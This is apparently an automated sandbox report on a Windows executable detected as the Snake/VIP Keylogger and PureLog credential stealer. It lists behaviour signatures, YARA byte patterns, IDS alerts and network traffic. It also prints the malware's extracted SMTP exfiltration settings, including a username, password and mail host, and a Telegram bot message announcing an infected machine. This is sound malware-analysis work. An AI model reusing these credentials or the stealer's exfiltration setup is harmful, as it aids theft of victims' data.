Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NOAH $$$$.exe

Overview

General Information

Sample name:NOAH $$$$.exe
Analysis ID:1550078
MD5:3d10835ad12c3ab37cd08002b14c4cbf
SHA1:ed8597462099dbaa058ec8cf11049effba9a1ae8
SHA256:72a7133bde9504a1bce251af15a80c092489f583fd74e060fa3f8a07943bd4a4
Tags:exeuser-threatcat_ch
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • NOAH $$$$.exe (PID: 3288 cmdline: "C:\Users\user\Desktop\NOAH $$$$.exe" MD5: 3D10835AD12C3AB37CD08002B14C4CBF)
    • RegSvcs.exe (PID: 3688 cmdline: "C:\Users\user\Desktop\NOAH $$$$.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "logistics@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "logistics@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2031225515.0000000002F40000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 52 88 44 24 2B 88 44 24 2F B0 95 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          Click to see the 27 entries
          SourceRuleDescriptionAuthorStrings
          2.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 52 88 44 24 2B 88 44 24 2F B0 95 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          0.2.NOAH $$$$.exe.2f40000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 52 88 44 24 2B 88 44 24 2F B0 95 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          2.2.RegSvcs.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 52 88 44 24 2B 88 44 24 2F B0 95 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          2.2.RegSvcs.exe.230a8be.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.RegSvcs.exe.230a8be.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              Click to see the 73 entries

              System Summary

              barindex
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 166.62.28.135, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 3688, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49807
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-06T12:45:11.927226+010020229301A Network Trojan was detected52.149.20.212443192.168.2.549712TCP
              2024-11-06T12:45:50.535046+010020229301A Network Trojan was detected4.175.87.197443192.168.2.549912TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-06T12:44:58.568211+010028033053Unknown Traffic192.168.2.549706188.114.97.3443TCP
              2024-11-06T12:45:18.401939+010028033053Unknown Traffic192.168.2.549739188.114.97.3443TCP
              2024-11-06T12:45:20.867306+010028033053Unknown Traffic192.168.2.549756188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-06T12:44:56.794577+010028032742Potentially Bad Traffic192.168.2.549704158.101.44.24280TCP
              2024-11-06T12:44:57.841475+010028032742Potentially Bad Traffic192.168.2.549704158.101.44.24280TCP
              2024-11-06T12:44:59.482137+010028032742Potentially Bad Traffic192.168.2.549707158.101.44.24280TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logistics@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587", "Version": "4.4"}
              Source: 2.2.RegSvcs.exe.23099d6.1.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logistics@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587"}
              Source: NOAH $$$$.exeReversingLabs: Detection: 47%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: NOAH $$$$.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: NOAH $$$$.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49771 version: TLS 1.2
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: NOAH $$$$.exe, 00000000.00000003.2021564875.0000000004200000.00000004.00001000.00020000.00000000.sdmp, NOAH $$$$.exe, 00000000.00000003.2027336930.00000000043A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: NOAH $$$$.exe, 00000000.00000003.2021564875.0000000004200000.00000004.00001000.00020000.00000000.sdmp, NOAH $$$$.exe, 00000000.00000003.2027336930.00000000043A0000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h2_2_020ADFA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0255E4C5h2_2_0255E307
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0255F781h2_2_0255F4CB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0255E4C5h2_2_0255E514
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0255E4C5h2_2_0255E597
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0255FBD9h2_2_0255F927
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_0255E9E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0536EFE1h2_2_0536ED38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0536F439h2_2_0536F190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0536F891h2_2_0536F5E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0536C471h2_2_0536C1C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0536E2D9h2_2_0536E030
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0536021Dh2_2_05360040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05360BA7h2_2_05360040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 053624ADh2_2_05362090
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 053624ADh2_2_05362081
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0536E731h2_2_0536E488
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0536EB89h2_2_0536E8E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0536D5D1h2_2_0536D328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0536DA29h2_2_0536D780
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 053624ADh2_2_053623DB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0536DE81h2_2_0536DBD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0536C8C9h2_2_0536C620
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0536CD21h2_2_0536CA78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0536FCE9h2_2_0536FA40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05361D39h2_2_05361A88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0536D179h2_2_0536CED0

              Networking

              barindex
              Source: unknownDNS query: name: api.telegram.org
              Source: Yara matchFile source: 2.2.RegSvcs.exe.23099d6.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: global trafficTCP traffic: 192.168.2.5:49807 -> 166.62.28.135:587
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2007/11/2024%20/%2012:59:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49739 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49756 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49712
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49912
              Source: global trafficTCP traffic: 192.168.2.5:49807 -> 166.62.28.135:587
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2007/11/2024%20/%2012:59:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficDNS traffic detected: DNS query: mail.starofseasmarine.com
